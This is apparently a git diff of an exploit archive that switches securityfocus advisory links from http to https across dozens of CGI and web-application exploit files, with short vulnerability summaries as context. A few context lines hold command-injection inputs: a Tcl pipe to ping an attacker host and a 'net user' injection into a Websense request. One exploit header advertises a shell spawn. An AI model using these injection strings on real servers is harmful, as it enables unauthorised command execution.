https://www.securityfocus.com/bid/15779/info Perl-Cal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/remote/32962.txt b/exploits/cgi/remote/32962.txt index 034a36ee1..6ad412c7a 100644 --- a/exploits/cgi/remote/32962.txt +++ b/exploits/cgi/remote/32962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34760/info +source: https://www.securityfocus.com/bid/34760/info LevelOne AMG-2000 is prone to a security-bypass vulnerability. diff --git a/exploits/cgi/remote/33051.txt b/exploits/cgi/remote/33051.txt index 0695d61ea..9d5494393 100644 --- a/exploits/cgi/remote/33051.txt +++ b/exploits/cgi/remote/33051.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35464/info +source: https://www.securityfocus.com/bid/35464/info Nagios is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/cgi/remote/36045.txt b/exploits/cgi/remote/36045.txt index ed76ca72d..74ece17c8 100644 --- a/exploits/cgi/remote/36045.txt +++ b/exploits/cgi/remote/36045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49160/info +source: https://www.securityfocus.com/bid/49160/info SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/remote/39074.txt b/exploits/cgi/remote/39074.txt index 6643e8139..4beff1566 100644 --- a/exploits/cgi/remote/39074.txt +++ b/exploits/cgi/remote/39074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65306/info +source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. diff --git a/exploits/cgi/webapps/15987.py b/exploits/cgi/webapps/15987.py index 5dc61d672..626ead0ea 100755 --- a/exploits/cgi/webapps/15987.py +++ b/exploits/cgi/webapps/15987.py @@ -49,7 +49,7 @@ http://www.website.com/dispatch.cgi/0;set fl [open "|ping www.attacker.com" ] References: ----------- -BID http://www.securityfocus.com/bid/26963 +BID https://www.securityfocus.com/bid/26963 CVE http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6515 Post http://securityvulns.com/Sdocument702.html PoC http://www.securestate.com/Documents/sitescape_sploit.txt diff --git a/exploits/cgi/webapps/18824.txt b/exploits/cgi/webapps/18824.txt index de6e55bd7..4f9cf6154 100644 --- a/exploits/cgi/webapps/18824.txt +++ b/exploits/cgi/webapps/18824.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51086/info +source: https://www.securityfocus.com/bid/51086/info Websense Triton is prone to a remote command-execution vulnerability. @@ -10,7 +10,7 @@ https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user a ################################################### -source: http://www.securityfocus.com/bid/51088/info +source: https://www.securityfocus.com/bid/51088/info Websense Triton 'favorites.exe' HTML Injection Vulnerability @@ -37,7 +37,7 @@ https://www.example.com/explorer_wse/favorites.exe?Program=ws_irpt.exe¶ms=st ################################################### -source: http://www.securityfocus.com/bid/51085/info +source: https://www.securityfocus.com/bid/51085/info Websense Triton Report Management Interface Cross Site Scripting Vulnerability diff --git a/exploits/cgi/webapps/21184.txt b/exploits/cgi/webapps/21184.txt index 08632b172..07473c392 100644 --- a/exploits/cgi/webapps/21184.txt +++ b/exploits/cgi/webapps/21184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3702/info +source: https://www.securityfocus.com/bid/3702/info Agora.cgi is a freely available, open source shopping cart system. diff --git a/exploits/cgi/webapps/21187.txt b/exploits/cgi/webapps/21187.txt index 7aa97b1d6..a3bb0b6e8 100644 --- a/exploits/cgi/webapps/21187.txt +++ b/exploits/cgi/webapps/21187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3714/info +source: https://www.securityfocus.com/bid/3714/info Aktivate is a shopping cart system which is geared towards Unix and Linux users, uses MySQL as a backend, and is written in Perl. diff --git a/exploits/cgi/webapps/21208.txt b/exploits/cgi/webapps/21208.txt index efcec0a6b..e51d4f441 100644 --- a/exploits/cgi/webapps/21208.txt +++ b/exploits/cgi/webapps/21208.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3828/info +source: https://www.securityfocus.com/bid/3828/info YaBB (Yet Another Bulletin Board) is freely available web forums/community software that is written in Perl. YaBB will run on most Unix/Linux variants, MacOS, and Microsoft Windows 9x/ME/NT/2000/XP platforms. diff --git a/exploits/cgi/webapps/21209.txt b/exploits/cgi/webapps/21209.txt index 6a7bdc4c0..311510647 100644 --- a/exploits/cgi/webapps/21209.txt +++ b/exploits/cgi/webapps/21209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3829/info +source: https://www.securityfocus.com/bid/3829/info UBB (Ultimate Bulletin Board) is commercial web forums/community software that is written in Perl. It runs on various Unix/Linux variants, as well as Microsoft Windows NT/2000. diff --git a/exploits/cgi/webapps/21257.txt b/exploits/cgi/webapps/21257.txt index 044194311..debf2dce7 100644 --- a/exploits/cgi/webapps/21257.txt +++ b/exploits/cgi/webapps/21257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3985/info +source: https://www.securityfocus.com/bid/3985/info Search.CGI is a component of the HTMLsearch Search Engine software distributed by AHG. The software is available for the Unix, Linux, and Microsoft platforms. diff --git a/exploits/cgi/webapps/21352.txt b/exploits/cgi/webapps/21352.txt index c143facf0..64a519b53 100644 --- a/exploits/cgi/webapps/21352.txt +++ b/exploits/cgi/webapps/21352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4356/info +source: https://www.securityfocus.com/bid/4356/info DCShop Beta is a freely available shopping cart system, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21374.txt b/exploits/cgi/webapps/21374.txt index 18e8dc613..aefa1f564 100644 --- a/exploits/cgi/webapps/21374.txt +++ b/exploits/cgi/webapps/21374.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4496/info +source: https://www.securityfocus.com/bid/4496/info Informix is an enterprise database distributed and maintained by IBM. The Web Datablade Module for Informix SQL, dynamically generates HTML content based on Database data. Web Datablade is available for Apache, IIS, and Netscape web servers, and a generic CGI version is provided for alternative servers. It will execute under Windows NT, Linux and many Unix-like systems. diff --git a/exploits/cgi/webapps/21405.txt b/exploits/cgi/webapps/21405.txt index e45c5ae7e..983b8800e 100644 --- a/exploits/cgi/webapps/21405.txt +++ b/exploits/cgi/webapps/21405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4565/info +source: https://www.securityfocus.com/bid/4565/info Faq-O-Matic 2.711 and 2.712 is a web-based Frequently Asked Question (FAQ) management system. It is vulnerable to a cross site scripting issue arising from a failure to filter HTML or script from a malformed query, returning the submitted script as an error message which is then processed by the browser. This is done by submitting the script as an argument to the Faq-O-Matic component "fom.cgi" - specifically, to the "file" parameter. This script is then treated by the user's browser as though it originated from the Faq-O-Matic web site. diff --git a/exploits/cgi/webapps/21406.txt b/exploits/cgi/webapps/21406.txt index c52e2dabd..fe1e8f3a4 100644 --- a/exploits/cgi/webapps/21406.txt +++ b/exploits/cgi/webapps/21406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4566/info +source: https://www.securityfocus.com/bid/4566/info Philip Chinery's Guestbook is freely available guestbook software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21411.txt b/exploits/cgi/webapps/21411.txt index ba26278b1..a17bdd587 100644 --- a/exploits/cgi/webapps/21411.txt +++ b/exploits/cgi/webapps/21411.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4573/info +source: https://www.securityfocus.com/bid/4573/info vqServer is a HTTP server implemented in Java. vqServer is available on any architecture supporting Java, including Linux and Microsoft Windows. diff --git a/exploits/cgi/webapps/21433.txt b/exploits/cgi/webapps/21433.txt index 3cc31296e..097de029d 100644 --- a/exploits/cgi/webapps/21433.txt +++ b/exploits/cgi/webapps/21433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4651/info +source: https://www.securityfocus.com/bid/4651/info MyGuestbook is freely available guestbook software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21435.txt b/exploits/cgi/webapps/21435.txt index 82cefb3d7..4a891f712 100644 --- a/exploits/cgi/webapps/21435.txt +++ b/exploits/cgi/webapps/21435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4670/info +source: https://www.securityfocus.com/bid/4670/info askSam is a database system. An optional component, askSam Web Publisher (versions 1 and 4), is reportedly vulnerable to cross site scripting vulnerability in the as_web.exe (or as_web4.exe) component. This is due to a failure to strip script and HTML when returning error messages that include user input. diff --git a/exploits/cgi/webapps/21460.pl b/exploits/cgi/webapps/21460.pl index af093d0bd..1a6041e9b 100755 --- a/exploits/cgi/webapps/21460.pl +++ b/exploits/cgi/webapps/21460.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4764/info +source: https://www.securityfocus.com/bid/4764/info CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick. diff --git a/exploits/cgi/webapps/21473.txt b/exploits/cgi/webapps/21473.txt index 57059b3e7..253f89642 100644 --- a/exploits/cgi/webapps/21473.txt +++ b/exploits/cgi/webapps/21473.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4818/info +source: https://www.securityfocus.com/bid/4818/info ViewCVS does not filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/21480.txt b/exploits/cgi/webapps/21480.txt index 78b1786ec..d761f227d 100644 --- a/exploits/cgi/webapps/21480.txt +++ b/exploits/cgi/webapps/21480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4825/info +source: https://www.securityfocus.com/bid/4825/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. diff --git a/exploits/cgi/webapps/21487.pl b/exploits/cgi/webapps/21487.pl index b3b3fdf4f..e1ced1f12 100755 --- a/exploits/cgi/webapps/21487.pl +++ b/exploits/cgi/webapps/21487.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4870/info +source: https://www.securityfocus.com/bid/4870/info IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner. diff --git a/exploits/cgi/webapps/21494.txt b/exploits/cgi/webapps/21494.txt index 5461ab9f2..02c105746 100644 --- a/exploits/cgi/webapps/21494.txt +++ b/exploits/cgi/webapps/21494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4887/info +source: https://www.securityfocus.com/bid/4887/info CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick. diff --git a/exploits/cgi/webapps/21495.txt b/exploits/cgi/webapps/21495.txt index 8cb47e285..07946ed22 100644 --- a/exploits/cgi/webapps/21495.txt +++ b/exploits/cgi/webapps/21495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4888/info +source: https://www.securityfocus.com/bid/4888/info CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick. 
diff --git a/exploits/cgi/webapps/21532.txt b/exploits/cgi/webapps/21532.txt index d272e0d54..1f8439020 100644 --- a/exploits/cgi/webapps/21532.txt +++ b/exploits/cgi/webapps/21532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4993/info +source: https://www.securityfocus.com/bid/4993/info csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21533.txt b/exploits/cgi/webapps/21533.txt index 42743fda9..61445994c 100644 --- a/exploits/cgi/webapps/21533.txt +++ b/exploits/cgi/webapps/21533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4994/info +source: https://www.securityfocus.com/bid/4994/info csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21535.txt b/exploits/cgi/webapps/21535.txt index 2bd91c26a..97022459b 100644 --- a/exploits/cgi/webapps/21535.txt +++ b/exploits/cgi/webapps/21535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4996/info +source: https://www.securityfocus.com/bid/4996/info The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment. diff --git a/exploits/cgi/webapps/21553.txt b/exploits/cgi/webapps/21553.txt index c6424c509..a3813c473 100644 --- a/exploits/cgi/webapps/21553.txt +++ b/exploits/cgi/webapps/21553.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5023/info +source: https://www.securityfocus.com/bid/5023/info NetAuction does not filter HTML code from URI parameters, making it prone to cross-site scripting attacks. Attacker-supplied HTML code may be included in a malicious links. The attacker-supplied HTML code will be executed in the browser of a web user who visits this link, in the security context of the host running NetAuction. Such a link might be included in a HTML e-mail or on a malicious webpage. diff --git a/exploits/cgi/webapps/21558.txt b/exploits/cgi/webapps/21558.txt index 4a8748551..11da53ec1 100644 --- a/exploits/cgi/webapps/21558.txt +++ b/exploits/cgi/webapps/21558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5029/info +source: https://www.securityfocus.com/bid/5029/info My Postcards is a commercial available eletronic postcard system. It is available for Unix and Linux Operating Systems. diff --git a/exploits/cgi/webapps/21567.pl b/exploits/cgi/webapps/21567.pl index 645eca086..d5536b9ee 100755 --- a/exploits/cgi/webapps/21567.pl +++ b/exploits/cgi/webapps/21567.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5048/info +source: https://www.securityfocus.com/bid/5048/info WebBBS does not sufficiently filter shell metacharacters from CGI parameters. As a result, remote attackers may execute arbitrary commands on the underlying shell of the system hosting the vulnerable software. diff --git a/exploits/cgi/webapps/21573.txt b/exploits/cgi/webapps/21573.txt index 933bc4888..a3a9640ba 100644 --- a/exploits/cgi/webapps/21573.txt +++ b/exploits/cgi/webapps/21573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5078/info +source: https://www.securityfocus.com/bid/5078/info It is reported possible for attackers to construct a URL that will cause scripting code to be embedded in error pages. diff --git a/exploits/cgi/webapps/21587.txt b/exploits/cgi/webapps/21587.txt index 8142dbd3d..f3c16d251 100644 
--- a/exploits/cgi/webapps/21587.txt +++ b/exploits/cgi/webapps/21587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5135/info +source: https://www.securityfocus.com/bid/5135/info Betsie (BBC Education Text to Speech Internet Enhancer) is prone to a cross-site scripting vulnerability. This issue exists in the parserl.pl script. diff --git a/exploits/cgi/webapps/21588.txt b/exploits/cgi/webapps/21588.txt index 2abb39bda..43a64d1bc 100644 --- a/exploits/cgi/webapps/21588.txt +++ b/exploits/cgi/webapps/21588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5137/info +source: https://www.securityfocus.com/bid/5137/info Blackboard is reportedly prone to cross-site scripting attacks. This issue was reported to be in the login.pl script. The vulnerable script fails to sanitize HTML tags from CGI parameters. diff --git a/exploits/cgi/webapps/21609.txt b/exploits/cgi/webapps/21609.txt index 9f5ba5046..0d68c75d9 100644 --- a/exploits/cgi/webapps/21609.txt +++ b/exploits/cgi/webapps/21609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5199/info +source: https://www.securityfocus.com/bid/5199/info Fluid Dynamics Search Engine is a search application for local and remote web sites, and is designed to work in most UNIX and Microsoft Windows environments. Fluid Dynamics Search Engine and is maintained by Zoltan Milosevic. diff --git a/exploits/cgi/webapps/21617.txt b/exploits/cgi/webapps/21617.txt index 532f85fd8..23c4a8ec9 100644 --- a/exploits/cgi/webapps/21617.txt +++ b/exploits/cgi/webapps/21617.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5238/info +source: https://www.securityfocus.com/bid/5238/info A vulnerability has been reported in the IMHO Roxen webmail module which may enable a malicious user of the webmail system to gain access to the account of another user. This issue is due to an error in configuration which may leak the REFERER for a session with the webmail system, which an attacker may use to access another webmail account. diff --git a/exploits/cgi/webapps/21658.html b/exploits/cgi/webapps/21658.html index db7ad2137..704385b01 100644 --- a/exploits/cgi/webapps/21658.html +++ b/exploits/cgi/webapps/21658.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5340/info +source: https://www.securityfocus.com/bid/5340/info The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages. diff --git a/exploits/cgi/webapps/21659.html b/exploits/cgi/webapps/21659.html index 893f9ac18..7cf848137 100644 --- a/exploits/cgi/webapps/21659.html +++ b/exploits/cgi/webapps/21659.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5341/info +source: https://www.securityfocus.com/bid/5341/info The vulnerability has been reported for Easy Guestbook 1.0. It is possible for an atttacker to modify any user's guestbook by deleting entries. The vulnerability is the result of Guestbook failing to properly authenticate users who wish to edit guestbooks. diff --git a/exploits/cgi/webapps/21679.txt b/exploits/cgi/webapps/21679.txt index 39f0f5999..805ffe3a1 100644 --- a/exploits/cgi/webapps/21679.txt +++ b/exploits/cgi/webapps/21679.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5392/info +source: https://www.securityfocus.com/bid/5392/info Dispair fails to sufficiently validate user-supplied input before it is passed to the shell via the Perl open() function. Remote attackers may potentially exploit this issue to execute arbitrary commands on the underlying shell with the privileges of the webserver process. diff --git a/exploits/cgi/webapps/21728.txt b/exploits/cgi/webapps/21728.txt index e9787c24c..66acb614b 100644 --- a/exploits/cgi/webapps/21728.txt +++ b/exploits/cgi/webapps/21728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5507/info +source: https://www.securityfocus.com/bid/5507/info Reportedly, Kerio Mailserver is vulnerable to cross site scripting attacks. The vulnerability is present in Kerio Mailserver's web mail component. diff --git a/exploits/cgi/webapps/21729.txt b/exploits/cgi/webapps/21729.txt index c006cbd57..05728fb1f 100644 --- a/exploits/cgi/webapps/21729.txt +++ b/exploits/cgi/webapps/21729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5516/info +source: https://www.securityfocus.com/bid/5516/info Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool. diff --git a/exploits/cgi/webapps/21730.txt b/exploits/cgi/webapps/21730.txt index 62e1db459..70685a782 100644 --- a/exploits/cgi/webapps/21730.txt +++ b/exploits/cgi/webapps/21730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5517/info +source: https://www.securityfocus.com/bid/5517/info A path disclosure vulnerability has been reported in Mozilla Bonsai. diff --git a/exploits/cgi/webapps/21768.txt b/exploits/cgi/webapps/21768.txt index 020a229f8..ee59c60aa 100644 --- a/exploits/cgi/webapps/21768.txt +++ b/exploits/cgi/webapps/21768.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5605/info +source: https://www.securityfocus.com/bid/5605/info Super Site Searcher is prone to remote command execution. Shell metacharacters are not adequately filtered from query string parameters in a request to the vulnerable search engine script. The parameters are then used in a function which passes commands directly through the shell. diff --git a/exploits/cgi/webapps/21769.txt b/exploits/cgi/webapps/21769.txt index f49864e52..d93ecf8b9 100644 --- a/exploits/cgi/webapps/21769.txt +++ b/exploits/cgi/webapps/21769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5618/info +source: https://www.securityfocus.com/bid/5618/info Aestiva HTML/OS is a database engine and development suite for building websites and web-based software products. diff --git a/exploits/cgi/webapps/21802.txt b/exploits/cgi/webapps/21802.txt index ad8e06d79..8d57afda2 100644 --- a/exploits/cgi/webapps/21802.txt +++ b/exploits/cgi/webapps/21802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5728/info +source: https://www.securityfocus.com/bid/5728/info Lycos htmlGEAR guestGEAR does not sanitize HTML from CSS (Cascading Style-Sheets) elements in guestbook fields. An attacker could capitalize on this situation to include arbitrary HTML and script code in a guestbook entries, which would be rendered in the web client of users who view the malicious guestbook entry. diff --git a/exploits/cgi/webapps/21877.txt b/exploits/cgi/webapps/21877.txt index cdb54f155..7c7485f8b 100644 --- a/exploits/cgi/webapps/21877.txt +++ b/exploits/cgi/webapps/21877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5823/info +source: https://www.securityfocus.com/bid/5823/info Emumail is an open source web mail application. It is available for the Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21878.txt b/exploits/cgi/webapps/21878.txt index 0c1f25821..7d3849e83 100644 
--- a/exploits/cgi/webapps/21878.txt +++ b/exploits/cgi/webapps/21878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5824/info +source: https://www.securityfocus.com/bid/5824/info Emumail is an open source web mail application. It is available for the Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21895.txt b/exploits/cgi/webapps/21895.txt index 072be019e..3307d931e 100644 --- a/exploits/cgi/webapps/21895.txt +++ b/exploits/cgi/webapps/21895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5852/info +source: https://www.securityfocus.com/bid/5852/info A flaw in the CGIServlet in Jetty allows an attacker to execute arbitrary commands on the server. Specifically, it is possible for an attacker to use directory traversal sequences and cause the CGIServlet to execute attacker-specified commands (such as running executables on the host). diff --git a/exploits/cgi/webapps/21926.txt b/exploits/cgi/webapps/21926.txt index 95986d90e..cad76b7f1 100644 --- a/exploits/cgi/webapps/21926.txt +++ b/exploits/cgi/webapps/21926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5932/info +source: https://www.securityfocus.com/bid/5932/info Authoria HR Suite is prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/21962.txt b/exploits/cgi/webapps/21962.txt index a9e86ee4c..30cb07aa3 100644 --- a/exploits/cgi/webapps/21962.txt +++ b/exploits/cgi/webapps/21962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6040/info +source: https://www.securityfocus.com/bid/6040/info Mojo Mail does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/21966.txt b/exploits/cgi/webapps/21966.txt index 177dea041..672caba5c 100644 --- a/exploits/cgi/webapps/21966.txt +++ b/exploits/cgi/webapps/21966.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6055/info +source: https://www.securityfocus.com/bid/6055/info A vulnerability exists in Mailreader.com which may enable remote attackers to disclose the contents of arbitrary webserver readable files. An attacker may exploit this issue by submitting a malicious web request containing dot-dot-slash (../) directory traversal sequences. The request must be for a known resource, and the file request must be appended by a null byte (%00). diff --git a/exploits/cgi/webapps/21979.txt b/exploits/cgi/webapps/21979.txt index 67705b8ab..c256a1748 100644 --- a/exploits/cgi/webapps/21979.txt +++ b/exploits/cgi/webapps/21979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6091/info +source: https://www.securityfocus.com/bid/6091/info A vulnerability has been discovered in ION Script. diff --git a/exploits/cgi/webapps/21995.txt b/exploits/cgi/webapps/21995.txt index 30a33a84d..81fdffafa 100644 --- a/exploits/cgi/webapps/21995.txt +++ b/exploits/cgi/webapps/21995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6127/info +source: https://www.securityfocus.com/bid/6127/info It has been reported that the default configuration of CuteCast is insecure. According to the report, CuteCast stores user information in a publicly accessible directory. This includes plaintext credentials. diff --git a/exploits/cgi/webapps/22015.txt b/exploits/cgi/webapps/22015.txt index 206fa7691..99054c7c4 100644 --- a/exploits/cgi/webapps/22015.txt +++ b/exploits/cgi/webapps/22015.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6170/info +source: https://www.securityfocus.com/bid/6170/info Versions of W3Mail 1.0.6 and greater are susceptible to a file disclosure vulnerability. To view attachments, the script "viewAttachment.cgi" accepts the parameter "file". The value of this parameter is passed to the open() function as the filename argument without being sanitized. Attackers may cause any file on the filesystem to open by specifying its relative path using directory traversal characters. diff --git a/exploits/cgi/webapps/22045.txt b/exploits/cgi/webapps/22045.txt index cb65838fa..30cbcfffe 100644 --- a/exploits/cgi/webapps/22045.txt +++ b/exploits/cgi/webapps/22045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6253/info +source: https://www.securityfocus.com/bid/6253/info The ext.dll ISAPI does not sufficiently sanitize user-supplied input when processing search queries. This may allow an attacker to create a custom URL containing script code that, when viewed in a browser by a legitimate user, will result in the execution of the script code. diff --git a/exploits/cgi/webapps/22050.txt b/exploits/cgi/webapps/22050.txt index c766abe4a..50271b1b7 100644 --- a/exploits/cgi/webapps/22050.txt +++ b/exploits/cgi/webapps/22050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6265/info +source: https://www.securityfocus.com/bid/6265/info Reportedly, ImageFolio is prone to cross site scripting attacks due to insufficient sanitization of user-supplied input. The vulnerability exists in various cgi scripts included with ImageFolio. diff --git a/exploits/cgi/webapps/22051.txt b/exploits/cgi/webapps/22051.txt index 7b5edeecc..6e65db29c 100644 --- a/exploits/cgi/webapps/22051.txt +++ b/exploits/cgi/webapps/22051.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6265/info +source: https://www.securityfocus.com/bid/6265/info Reportedly, ImageFolio is prone to cross site scripting attacks due to insufficient sanitization of user-supplied input. The vulnerability exists in various cgi scripts included with ImageFolio. diff --git a/exploits/cgi/webapps/22052.txt b/exploits/cgi/webapps/22052.txt index d6512d9f9..83bf12802 100644 --- a/exploits/cgi/webapps/22052.txt +++ b/exploits/cgi/webapps/22052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6272/info +source: https://www.securityfocus.com/bid/6272/info A cross-site scripting vulnerability has been reported in the YaBB forum. This vulnerability is due to insufficient sanitization of URI parameters in some scripts. diff --git a/exploits/cgi/webapps/22111.pl b/exploits/cgi/webapps/22111.pl index c3b9ac029..11d0261da 100755 --- a/exploits/cgi/webapps/22111.pl +++ b/exploits/cgi/webapps/22111.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6472/info +source: https://www.securityfocus.com/bid/6472/info CHETCPASSWD is prone to a vulnerability that may potentially cause the tail end of the local shadow file to be disclosed to a remote attacker. diff --git a/exploits/cgi/webapps/22137.txt b/exploits/cgi/webapps/22137.txt index 9c96ee912..ff101d998 100644 --- a/exploits/cgi/webapps/22137.txt +++ b/exploits/cgi/webapps/22137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6570/info +source: https://www.securityfocus.com/bid/6570/info FormMail-clone is allegedly prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/22169.pl b/exploits/cgi/webapps/22169.pl index 9f3d119b0..87eb2f31a 100755 --- a/exploits/cgi/webapps/22169.pl +++ b/exploits/cgi/webapps/22169.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6607/info +source: https://www.securityfocus.com/bid/6607/info Psunami Bulletin Board is prone to a remote command execution vulnerability. 
diff --git a/exploits/cgi/webapps/22170.pl b/exploits/cgi/webapps/22170.pl index 66ff08f8a..d5216a6cf 100755 --- a/exploits/cgi/webapps/22170.pl +++ b/exploits/cgi/webapps/22170.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6607/info +source: https://www.securityfocus.com/bid/6607/info Psunami Bulletin Board is prone to a remote command execution vulnerability. @@ -7,7 +7,7 @@ Psunami does not sufficiently sanitize shell metacharacters from query string pa ##################################################### # Shopcart exploit # Spawn bash style Shell with webserver uid -# http://www.securityfocus.com/bid/6607 +# https://www.securityfocus.com/bid/6607 # Spabam 2003 PRIV8 code # #hackarena irc.brasnet.org # This Script is currently under development diff --git a/exploits/cgi/webapps/22198.txt b/exploits/cgi/webapps/22198.txt index b3d6890dd..26f4084d7 100644 --- a/exploits/cgi/webapps/22198.txt +++ b/exploits/cgi/webapps/22198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6677/info +source: https://www.securityfocus.com/bid/6677/info A vulnerability has been discovered in GNU Mailman. It has been reported that Mailman is prone to cross site scripting attacks. This is due to insufficient santization of URI parameters. diff --git a/exploits/cgi/webapps/22199.txt b/exploits/cgi/webapps/22199.txt index 4951ff32d..8f6f712a5 100644 --- a/exploits/cgi/webapps/22199.txt +++ b/exploits/cgi/webapps/22199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6678/info +source: https://www.securityfocus.com/bid/6678/info A vulnerability has been discovered in GNU Mailman. The issue occurs to insufficient sanitization of user-supplied data which is output when generating error pages. diff --git a/exploits/cgi/webapps/22204.txt b/exploits/cgi/webapps/22204.txt index 6fa68ab07..c19d2ce73 100644 --- a/exploits/cgi/webapps/22204.txt +++ b/exploits/cgi/webapps/22204.txt 
